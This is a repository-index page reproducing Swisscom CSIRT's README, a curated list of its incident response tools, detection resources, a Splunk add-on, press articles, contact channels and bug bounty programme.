https://github.com/swisscom/swisscom-csirt-resources

A curated list of analysis tools and resources created or maintained by Swisscom CSIRT.
https://github.com/swisscom/swisscom-csirt-resources

Last synced: 4 months ago
JSON representation

A curated list of analysis tools and resources created or maintained by Swisscom CSIRT.

• Host: GitHub
• URL: https://github.com/swisscom/swisscom-csirt-resources
• Owner: swisscom
• License: cc0-1.0
• Created: 2021-02-23T12:35:23.000Z (over 5 years ago)
• Default Branch: main
• Last Pushed: 2021-10-28T19:46:34.000Z (over 4 years ago)
• Last Synced: 2025-07-05T06:37:14.285Z (11 months ago)
• Homepage:
• Size: 12.7 KB
• Stars: 7
• Watchers: 16
• Forks: 2
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

          
# Swisscom CSIRT Resources

A curated list of analysis tools and resources created or maintained by Swisscom CSIRT.

Besides the tool mentioned below, our team contributes to various tools, among others to [Sigma](https://github.com/SigmaHQ/sigma), [KapeFiles](https://github.com/EricZimmerman/KapeFiles), [forensic artifacts](https://github.com/forensicartifacts/artifacts), [RECmd](https://github.com/EricZimmerman/RECmd) and [RegRipper](https://github.com/keydet89/RegRipper3.0).

## Internet articles

Here's a list of internet articles from various activities around the Swisscom CSIRT.

* [Die guten Hacker [DE], 31 August 2016](https://www.swisscom.ch/de/magazin/datensicherheit-infrastruktur/die-guten-hacker/)

* [Mr Red v. Mr Blue – a stress test for Swisscom, 8 November 2018](https://www.swisscom.ch/en/business/enterprise/themen/security/cyber-security-defense-csirt.html)

* [Paying a visit to the IT fire brigade, 15 May 2020](https://www.swisscom.ch/en/business/enterprise/themen/security/soc-csirt-arbeitstag.html)

* [On the hunt for hidden attackers, 18 September 2020](https://www.swisscom.ch/en/business/enterprise/themen/security/threat-hunting.html)

## Incident Response Tools

* [PowerGRR](https://github.com/swisscom/PowerGRR) - PowerGRR is an API client library in PowerShell working on Windows, Linux and macOS for GRR automation and scripting.

* [PowerSponse](https://github.com/swisscom/PowerSponse) - PowerSponse is a PowerShell module focused on targeted containment and remediation during incident response.

* [ArtifactCollectionMatrix](https://github.com/swisscom/ArtifactCollectionMatrix) - Forensic Artifact Collection Tool Matrix.	

* [Invoke-Forensics](https://github.com/swisscom/Invoke-Forensics) - Invoke-Forensics provides PowerShell scripts to simplify working with [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape)'s

[targets and modules (KapeFiles)](https://github.com/EricZimmerman/KapeFiles) and [RegRipper](https://github.com/keydet89/RegRipper3.0)'s

[plugins](https://github.com/keydet89/RegRipper3.0/tree/master/plugins).

  

## Detection Resources

* [detections](https://github.com/swisscom/detections) - This repo contains threat intelligence information and threat detection indicators (IOC, IOA) shared by Swisscom CSIRT.

## Log Management Tools

* [PowerShell Splunk Addon](https://github.com/swisscom/splunk-addon-powershell/) - Splunk Add-on for PowerShell provides field extraction for PowerShell event logs.

## Communication Channels

* [Twitter](https://twitter.com/swisscom_csirt) - Swisscom CSIRT on Twitter.

* [FIRST](https://www.first.org/members/teams/swisscom_csirt) - FIRST team page.

## Vulnerability Management

* [Bug Bounty](https://www.swisscom.ch/en/about/security/bug-bounty.html) - Our Bug Bounty programme supports the reporting and quick elimination of security gaps (bugs) in our products and services. We invite both private individuals and organisations to report weak points to our Computer Security Incident Response Team (CSIRT).